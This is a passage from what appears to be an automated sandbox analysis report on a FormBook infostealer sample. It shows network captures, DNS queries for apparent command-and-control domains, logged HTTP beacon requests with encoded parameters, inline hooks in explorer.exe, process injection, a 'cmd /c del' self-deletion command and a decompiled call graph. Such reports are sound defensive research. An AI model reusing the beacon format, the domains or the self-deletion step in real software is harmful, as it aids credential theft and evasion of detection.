                    Jan 14, 2022 03:39:09.373507023 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373677969 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.373833895 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.373939037 CET4981980192.168.2.323.227.38.74

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 03:38:27.518068075 CET5265053192.168.2.38.8.8.8
                    Jan 14, 2022 03:38:27.765955925 CET53526508.8.8.8192.168.2.3
                    Jan 14, 2022 03:38:48.632225037 CET6329753192.168.2.38.8.8.8
                    Jan 14, 2022 03:38:48.656395912 CET53632978.8.8.8192.168.2.3
                    Jan 14, 2022 03:39:09.281239986 CET5361553192.168.2.38.8.8.8
                    Jan 14, 2022 03:39:09.309283972 CET53536158.8.8.8192.168.2.3
                    Jan 14, 2022 03:39:29.496071100 CET5072853192.168.2.38.8.8.8
                    Jan 14, 2022 03:39:29.602072954 CET53507288.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 14, 2022 03:38:27.518068075 CET192.168.2.38.8.8.80x7cddStandard query (0)www.nanasyhogar.comA (IP address)IN (0x0001)
                    Jan 14, 2022 03:38:48.632225037 CET192.168.2.38.8.8.80x7e08Standard query (0)www.alibabasdeli.comA (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:09.281239986 CET192.168.2.38.8.8.80xd5acStandard query (0)www.gigasupplies.comA (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:29.496071100 CET192.168.2.38.8.8.80x1d40Standard query (0)www.mnbvending.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 14, 2022 03:38:27.765955925 CET8.8.8.8192.168.2.30x7cddNo error (0)www.nanasyhogar.comnanasyhogar.comCNAME (Canonical name)IN (0x0001)
                    Jan 14, 2022 03:38:27.765955925 CET8.8.8.8192.168.2.30x7cddNo error (0)nanasyhogar.com50.31.177.38A (IP address)IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET8.8.8.8192.168.2.30x7e08No error (0)www.alibabasdeli.com172.67.173.57A (IP address)IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET8.8.8.8192.168.2.30x7e08No error (0)www.alibabasdeli.com104.21.30.160A (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET8.8.8.8192.168.2.30xd5acNo error (0)www.gigasupplies.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET8.8.8.8192.168.2.30xd5acNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:29.602072954 CET8.8.8.8192.168.2.30x1d40No error (0)www.mnbvending.com199.59.243.200A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.nanasyhogar.com
                    • www.alibabasdeli.com
                    • www.gigasupplies.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.34979350.31.177.3880C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 03:38:27.889576912 CET10300OUTGET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1
                    Host: www.nanasyhogar.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:28.461199999 CET10301INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html; charset=UTF-8
                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                    cache-control: no-cache, must-revalidate, max-age=0
                    x-redirect-by: WordPress
                    location: https://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf
                    content-length: 0
                    date: Fri, 14 Jan 2022 02:38:27 GMT


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.349808172.67.173.5780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 03:38:48.677973032 CET12054OUTGET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1
                    Host: www.alibabasdeli.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:48.705641031 CET12055INHTTP/1.1 301 Moved Permanently
                    Date: Fri, 14 Jan 2022 02:38:48 GMT
                    Transfer-Encoding: chunked
                    Connection: close
                    Cache-Control: max-age=3600
                    Expires: Fri, 14 Jan 2022 03:38:48 GMT
                    Location: https://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IgjFfWdmsLKF6nMy5eaecanBpYGYtijY%2F9ML7bYbo0jwULbFmirtMXIUFdaeYKaZw0SjcZLe8AgxrbUYROuDN%2FNsw420lPpE5m2qvu%2BdTZvcH%2BD2gpXk494OMVi7AvX9wFxVMZB9xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6cd37d8248424df4-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.34981923.227.38.7480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 03:39:09.329226017 CET12088OUTGET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1
                    Host: www.gigasupplies.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:39:09.373367071 CET12089INHTTP/1.1 403 Forbidden
                    Date: Fri, 14 Jan 2022 02:39:09 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    X-Sorting-Hat-PodId: 188
                    X-Sorting-Hat-ShopId: 60258091197
                    X-Dc: gcp-europe-west1
                    X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ce
                    X-Permitted-Cross-Domain-Policies: none
                    X-XSS-Protection: 1; mode=block
                    X-Download-Options: noopen
                    X-Content-Type-Options: nosniff
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 6cd37e035a694e0e-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                    Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
                    Jan 14, 2022 03:39:09.373408079 CET12091INData Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72
                    Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
                    Jan 14, 2022 03:39:09.373435974 CET12092INData Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69
                    Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                    Jan 14, 2022 03:39:09.373460054 CET12093INData Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0
                    Data Ascii: ", "content-title": " " }, "ja": { "title": "
                    Jan 14, 2022 03:39:09.373477936 CET12094INData Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75
                    Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
                    Jan 14, 2022 03:39:09.373492002 CET12094INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    PeekMessageAINLINEexplorer.exe
                    PeekMessageWINLINEexplorer.exe
                    GetMessageWINLINEexplorer.exe
                    GetMessageAINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function NameHook TypeNew Data
                    PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: nji3Lg1ot6.exe PID: 5092 Parent PID: 3160

                    General

                    Start time:03:37:19
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Analysis Process: nji3Lg1ot6.exe PID: 6920 Parent PID: 5092

                    General

                    Start time:03:37:20
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Analysis Process: explorer.exe PID: 3352 Parent PID: 6920

                    General

                    Start time:03:37:23
                    Start date:14/01/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Chronological Activities

                    Analysis Process: autochk.exe PID: 6480 Parent PID: 3352

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\autochk.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\SysWOW64\autochk.exe
                    Imagebase:0xdc0000
                    File size:871424 bytes
                    MD5 hash:34236DB574405291498BCD13D20C42EB
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Chronological Activities

                    Analysis Process: msiexec.exe PID: 1304 Parent PID: 3352

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                    Imagebase:0x890000
                    File size:59904 bytes
                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 7156 Parent PID: 1304

                    General

                    Start time:03:37:46
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: conhost.exe PID: 5352 Parent PID: 7156

                    General

                    Start time:03:37:47
                    Start date:14/01/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >

                      Analysis Process: nji3Lg1ot6.exe PID: 5092 Parent PID: 3160 nji3Lg1ot6.exeCOMMON

                      Execution Graph

                      Execution Coverage:12%
                      Dynamic/Decrypted Code Coverage:6.2%
                      Signature Coverage:22.3%
                      Total number of Nodes:1329
                      Total number of Limit Nodes:25

                      Graph

                      execution_graph 3899 401cc1 GetDlgItem GetClientRect 3900 4029e8 18 API calls 3899->3900 3901 401cf1 LoadImageA SendMessageA 3900->3901 3902 40287d 3901->3902 3903 401d0f DeleteObject 3901->3903 3903->3902 3904 401dc1 3905 4029e8 18 API calls 3904->3905 3906 401dc7 3905->3906 3907 4029e8 18 API calls 3906->3907 3908 401dd0 3907->3908 3909 4029e8 18 API calls 3908->3909 3910 401dd9 3909->3910 3911 4029e8 18 API calls 3910->3911 3912 401de2 3911->3912 3913 401423 25 API calls 3912->3913 3914 401de9 ShellExecuteA 3913->3914 3915 401e16 3914->3915 3916 401ec5 3917 4029e8 18 API calls 3916->3917 3918 401ecc GetFileVersionInfoSizeA 3917->3918 3919 401eef GlobalAlloc 3918->3919 3926 401f45 3918->3926 3920 401f03 GetFileVersionInfoA 3919->3920 3919->3926 3921 401f14 VerQueryValueA 3920->3921 3920->3926 3922 401f2d 3921->3922 3921->3926 3927 4059e3 wsprintfA 3922->3927 3924 401f39 3928 4059e3 wsprintfA 3924->3928 3927->3924 3928->3926 3929 4014ca 3930 404e23 25 API calls 3929->3930 3931 4014d1 3930->3931 3932 403f4b lstrcpynA lstrlenA 3933 40604c 3939 405ed0 3933->3939 3934 40683b 3935 405f51 GlobalFree 3936 405f5a GlobalAlloc 3935->3936 3936->3934 3936->3939 3937 405fd1 GlobalAlloc 3937->3934 3937->3939 3938 405fc8 GlobalFree 3938->3937 3939->3934 3939->3935 3939->3936 3939->3937 3939->3938 3335 401f51 3336 401f63 3335->3336 3337 402004 3335->3337 3356 4029e8 3336->3356 3340 401423 25 API calls 3337->3340 3346 40215b 3340->3346 3341 4029e8 18 API calls 3342 401f73 3341->3342 3343 401f88 LoadLibraryExA 3342->3343 3344 401f7b GetModuleHandleA 3342->3344 3343->3337 3345 401f98 GetProcAddress 3343->3345 3344->3343 3344->3345 3347 401fe5 3345->3347 3348 401fa8 3345->3348 3371 404e23 3347->3371 3350 401fb0 3348->3350 3351 401fc7 3348->3351 3368 401423 3350->3368 3362 72fb10a0 3351->3362 3352 401fb8 3352->3346 3354 401ff8 FreeLibrary 3352->3354 3354->3346 3357 4029f4 3356->3357 3382 405aa7 3357->3382 3360 401f6a 3360->3341 3422 72fb1000 3362->3422 3364 72fb10ad GetTempPathW 3424 72fb1030 3364->3424 3367 72fb117b 3367->3352 3369 404e23 25 API calls 3368->3369 3370 401431 3369->3370 3370->3352 3372 404e3e 3371->3372 3380 404ee1 3371->3380 3373 404e5b lstrlenA 3372->3373 3376 405aa7 18 API calls 3372->3376 3374 404e84 3373->3374 3375 404e69 lstrlenA 3373->3375 3378 404e97 3374->3378 3379 404e8a SetWindowTextA 3374->3379 3377 404e7b lstrcatA 3375->3377 3375->3380 3376->3373 3377->3374 3378->3380 3381 404e9d SendMessageA SendMessageA SendMessageA 3378->3381 3379->3378 3380->3352 3381->3380 3383 405ab4 3382->3383 3384 405cca 3383->3384 3387 405b48 GetVersion 3383->3387 3388 405ca1 lstrlenA 3383->3388 3391 405aa7 10 API calls 3383->3391 3395 405ce3 5 API calls 3383->3395 3415 4059e3 wsprintfA 3383->3415 3416 405a85 lstrcpynA 3383->3416 3385 402a15 3384->3385 3417 405a85 lstrcpynA 3384->3417 3385->3360 3401 405ce3 3385->3401 3399 405b55 3387->3399 3388->3383 3391->3388 3393 405bc0 GetSystemDirectoryA 3393->3399 3394 405bd3 GetWindowsDirectoryA 3394->3399 3395->3383 3396 405c07 SHGetSpecialFolderLocation 3396->3399 3400 405c1f SHGetPathFromIDListA CoTaskMemFree 3396->3400 3397 405aa7 10 API calls 3397->3399 3398 405c4a lstrcatA 3398->3383 3399->3383 3399->3393 3399->3394 3399->3396 3399->3397 3399->3398 3410 40596c RegOpenKeyExA 3399->3410 3400->3399 3408 405cef 3401->3408 3402 405d57 3403 405d5b CharPrevA 3402->3403 3405 405d76 3402->3405 3403->3402 3404 405d4c CharNextA 3404->3402 3404->3408 3405->3360 3407 405d3a CharNextA 3407->3408 3408->3402 3408->3404 3408->3407 3409 405d47 CharNextA 3408->3409 3418 4055a3 3408->3418 3409->3404 3411 4059dd 3410->3411 3412 40599f RegQueryValueExA 3410->3412 3411->3399 3413 4059c0 RegCloseKey 3412->3413 3413->3411 3415->3383 3416->3383 3417->3385 3419 4055a9 3418->3419 3420 4055bc 3419->3420 3421 4055af CharNextA 3419->3421 3420->3408 3421->3419 3423 72fb100c 3422->3423 3423->3364 3423->3423 3425 72fb1045 VirtualProtect CreateFileW ReadFile 3424->3425 3425->3367 3947 4014d6 3952 4029cb 3947->3952 3949 4014dc Sleep 3951 40287d 3949->3951 3953 405aa7 18 API calls 3952->3953 3954 4029df 3953->3954 